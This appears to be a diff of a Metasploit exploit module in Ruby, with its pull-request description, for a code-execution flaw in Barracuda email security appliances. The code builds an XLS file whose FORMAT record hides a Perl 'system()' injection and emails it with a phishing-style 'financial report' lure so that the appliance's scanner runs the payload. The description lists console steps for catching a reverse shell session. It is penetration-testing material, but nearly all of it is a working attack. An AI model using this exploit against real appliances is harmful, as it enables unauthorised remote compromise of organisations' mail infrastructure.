+    email_data = generate_exploit_email(xls_data)
+
+    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")
+    send_message(email_data)
+
+    print_good('Email sent successfully')
+    print_status('Payload executes when Amavis scanner parses the XLS attachment (may take 30-90 seconds)')
+  end
+
+  #
+  # Generate a malicious XLS file with payload embedded in FORMAT record
+  # Uses Rex::OLE for OLE2 container and builds BIFF8 records dynamically
+  #
+  def generate_malicious_xls(cmd)
+    # Build the malicious format string
+    # Format: [>0;system('COMMAND')]0
+    # The >0 comparison is always true for positive numbers, then Perl executes system()
+    format_payload = "[>0;system('#{cmd}')]0"
+    vprint_status("Format string payload: #{format_payload}")
+    vprint_status("Payload length: #{format_payload.length} bytes")
+
+    # Build BIFF8 workbook stream
+    workbook = build_workbook_stream(format_payload)
+
+    # Build BIFF8 worksheet stream
+    worksheet = build_worksheet_stream
+
+    # Combine streams (worksheet follows workbook globals in same stream)
+    content = workbook + worksheet
+
+    # Create OLE2 container using Rex::OLE
+    xls_data = create_ole2_xls(content)
+
+    vprint_status("Generated XLS size: #{xls_data.length} bytes")
+    xls_data
+  end
+
+  #
+  # Build BIFF8 workbook globals stream
+  #
+  def build_workbook_stream(format_payload)
+    stream = ''.b
+
+    # BOF - Workbook
+    stream << biff_record(BIFF8_BOF, bof_data(BOF_WORKBOOK))
+
+    # Codepage (UTF-16)
+    stream << biff_record(BIFF8_CODEPAGE, [0x04B0].pack('v'))
+
+    # Window1 - basic window settings
+    stream << biff_record(BIFF8_WINDOW1, window1_data)
+
+    # Datemode - 1900 date system
+    stream << biff_record(BIFF8_DATEMODE, [0x0000].pack('v'))
+
+    # Font records (need at least 4 for XF records)
+    4.times { stream << biff_record(BIFF8_FONT, font_data) }
+
+    # FORMAT record - this is where our payload lives
+    stream << biff_record(BIFF8_FORMAT, format_data(format_payload))
+
+    # XF records (cell formatting) - need 21 built-in + 1 custom
+    21.times { stream << biff_record(BIFF8_XF, xf_data(0)) }
+    stream << biff_record(BIFF8_XF, xf_data(165)) # References our custom format
+
+    # Style record
+    stream << biff_record(BIFF8_STYLE, style_data)
+
+    # Boundsheet - defines Sheet1 (offset fixed to 0, will be after workbook globals)
+    stream << biff_record(BIFF8_BOUNDSHEET, boundsheet_data(stream.length + 12)) # +12 for this record
+
+    # EOF
+    stream << biff_record(BIFF8_EOF, '')
+
+    stream
+  end
+
+  #
+  # Build BIFF8 worksheet stream
+  #
+  def build_worksheet_stream
+    stream = ''.b
+
+    # BOF - Worksheet
+    stream << biff_record(BIFF8_BOF, bof_data(BOF_WORKSHEET))
+
+    # Dimension - 1x1 used range
+    stream << biff_record(BIFF8_DIMENSION, dimension_data)
+
+    # Row definition
+    stream << biff_record(BIFF8_ROW, row_data(0))
+
+    # NUMBER record - cell with value that triggers format processing
+    # Row 0, Col 0, XF index 21 (our custom format), Value 123.0
+    stream << biff_record(BIFF8_NUMBER, number_data(0, 0, 21, 123.0))
+
+    # EOF
+    stream << biff_record(BIFF8_EOF, '')
+
+    stream
+  end
+
+  #
+  # Create OLE2 compound document containing the workbook stream
+  #
+  def create_ole2_xls(content)
+    # Create temporary file for Rex::OLE
+    tmpfile = Rex::Quickfile.new('msf-xls')
+    tmppath = tmpfile.path
+    tmpfile.close
+
+    begin
+      stg = Rex::OLE::Storage.new(tmppath, Rex::OLE::STGM_WRITE)
+      fail_with(Failure::Unknown, 'Failed to create OLE storage') unless stg
+
+      stm = stg.create_stream('Workbook')
+      fail_with(Failure::Unknown, 'Failed to create Workbook stream') unless stm
+
+      stm << content
+      stm.close
+      stg.close
+
+      # Read the generated file
+      xls_data = File.binread(tmppath)
+      xls_data
+    ensure
+      File.delete(tmppath) if File.exist?(tmppath)
+    end
+  end
+
+  # BIFF8 Record Helpers
+
+  #
+  # Build a BIFF8 record: opcode (2 bytes) + length (2 bytes) + data
+  #
+  def biff_record(opcode, data)
+    [opcode, data.bytesize].pack('v2') + data
+  end
+
+  #
+  # BOF record data
+  #
+  def bof_data(sheet_type)
+    [
+      BIFF8_VERSION,   # BIFF version
+      sheet_type,      # Sheet type (workbook or worksheet)
+      0x0DBB,          # Build identifier
+      0x07CC,          # Build year
+      0x000000C1,      # File history flags
+      0x00000006       # Lowest BIFF version
+    ].pack('v4V2')
+  end
+
+  #
+  # Window1 record data
+  #
+  def window1_data
+    [
+      0x0000,  # Horizontal position
+      0x0000,  # Vertical position
+      0x4000,  # Width
+      0x2000,  # Height
+      0x0038,  # Options
+      0x0000,  # Selected tab
+      0x0000,  # First displayed tab
+      0x0001,  # Selected tabs count
+      0x00E5   # Tab bar width ratio
+    ].pack('v9')
+  end
+
+  #
+  # Font record data
+  #
+  def font_data
+    font_name = 'Arial'
+    data = [
+      0x00C8,           # Height (200 twips = 10pt)
+      0x0000,           # Options
+      0x7FFF,           # Color index
+      0x0190,           # Font weight (400 = normal)
+      0x0000,           # Escapement
+      0x00,             # Underline
+      0x00,             # Font family
+      0x00,             # Character set
+      0x00,             # Reserved
+      font_name.length  # Name length (byte string)
+    ].pack('v4vC5')
+    data << font_name
+    data
+  end
+
+  #
+  # FORMAT record data - contains our payload
+  #
+  def format_data(format_string)
+    # FORMAT record structure for BIFF8:
+    # - 2 bytes: format index (custom formats start at 164)
+    # - 2 bytes: string length (character count)
+    # - 1 byte: encoding flag (0 = compressed/Latin-1, 1 = UTF-16)
+    # - variable: string data
+    format_index = 165
+
+    data = [
+      format_index,
+      format_string.length,
+      0x00 # Latin-1 encoding (single byte per char)
+    ].pack('v2C')
+    data << format_string
+    data
+  end
+
+  #
+  # XF (extended format) record data
+  #
+  def xf_data(format_index)
+    [
+      0x0000,        # Font index
+      format_index,  # Format index (0 = General, 165 = our custom)
+      0x0001,        # Type/protection flags
+      0x00,          # Alignment
+      0x00,          # Rotation
+      0x00,          # Text properties
+      0x00,          # Used attributes
+      0x00000000,    # Border colors
+      0x00000000,    # Border lines
+      0x00000000     # Pattern/background color
+    ].pack('v3C4V3')
+  end
+
+  #
+  # Style record data
+  #
+  def style_data
+    [
+      0x8000,  # XF index with built-in flag set
+      0x00,    # Built-in style ID (Normal)
+      0xFF     # Outline level
+    ].pack('vCC')
+  end
+
+  #
+  # Boundsheet record data
+  #
+  def boundsheet_data(sheet_offset)
+    sheet_name = 'Sheet1'
+    data = [
+      sheet_offset,       # Absolute offset to BOF
+      0x00,               # Sheet state (visible)
+      0x00,               # Sheet type (worksheet)
+      sheet_name.length   # Name length
+    ].pack('VCC C')
+    data << sheet_name
+    data
+  end
+
+  #
+  # Dimension record data
+  #
+  def dimension_data
+    [
+      0x0000,  # First row
+      0x0001,  # Last row + 1
+      0x0000,  # First column
+      0x0001,  # Last column + 1
+      0x0000   # Reserved
+    ].pack('v5')
+  end
+
+  #
+  # Row record data
+  #
+  def row_data(row_num)
+    [
+      row_num,  # Row number
+      0x0000,   # First defined column
+      0x0001,   # Last defined column + 1
+      0x00FF,   # Row height
+      0x0000,   # Reserved
+      0x0000,   # Reserved
+      0x0100    # Options
+    ].pack('v7')
+  end
+
+  #
+  # NUMBER record data
+  #
+  def number_data(row, col, xf_index, value)
+    data = [row, col, xf_index].pack('v3')
+    data << [value].pack('E') # 64-bit IEEE 754 double (little-endian)
+    data
+  end
+
+  #
+  # Generate MIME email with XLS attachment
+  #
+  def generate_exploit_email(xls_data)
+    msg = Rex::MIME::Message.new
+    msg.mime_defaults
+    msg.from = datastore['MAILFROM']
+    msg.to = datastore['MAILTO']
+    msg.subject = datastore['SUBJECT']
+
+    # Add text body
+    body_text = datastore['BODY'].to_s.strip
+    if body_text.empty?
+      body_text = "Please review the attached financial report.\n\nBest regards"
+    end
+    msg.add_part(body_text, 'text/plain', nil, 'inline')
+
+    # Add XLS attachment
+    filename = datastore['FILENAME'].to_s.strip
+    if filename.empty?
+      filename = "Report_#{Rex::Text.rand_text_alpha(6)}.xls"
+    end
+    msg.add_part_attachment(xls_data, filename)
+
+    msg.to_s
+  end
+end


### PR DESCRIPTION
## Summary

Adds exploit module for CVE-2023-7102, an arbitrary code execution vulnerability in Barracuda ESG appliances via Spreadsheet::ParseExcel. The Amavis scanner's use of this Perl library allows code execution through malicious Excel Number format strings containing eval injection.

Builds on haile01's CVE-2023-7101 technique. Uses Rex::OLE to dynamically generate BIFF8 XLS files with payload embedded in FORMAT records.

Tested against physical Barracuda ESG 300 appliance with native MSF session.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT 4444`
- [ ] `run -j`
- [ ] `use exploit/linux/smtp/barracuda_esg_spreadsheet_rce`
- [ ] `set RHOST <target_esg>`
- [ ] `set MAILTO <valid_email_on_esg>`
- [ ] `set LHOST <your_ip>`
- [ ] `run`
- [ ] **Verify** email sent successfully
- [ ] **Verify** session opens after 30-90 seconds (Amavis processing delay)
- [ ] **Verify** payloads containing `]` or `'` fail with clear error message
- [ ] **Document** included at `documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md`

## Testing

Tested on physical Barracuda ESG 300 appliance (firmware 8.0.1.001). Screenshot attached showing exploit execution and native MSF session.

<img width="1550" height="440" alt="Screenshot 2026-02-28 211931" src="https://github.com/user-attachments/assets/44ea6aae-18ea-494e-8afd-154dc4664346" />


This falls under "specific hardware" — email security appliances with limited availability. Happy to provide pcap or additional demonstration if needed.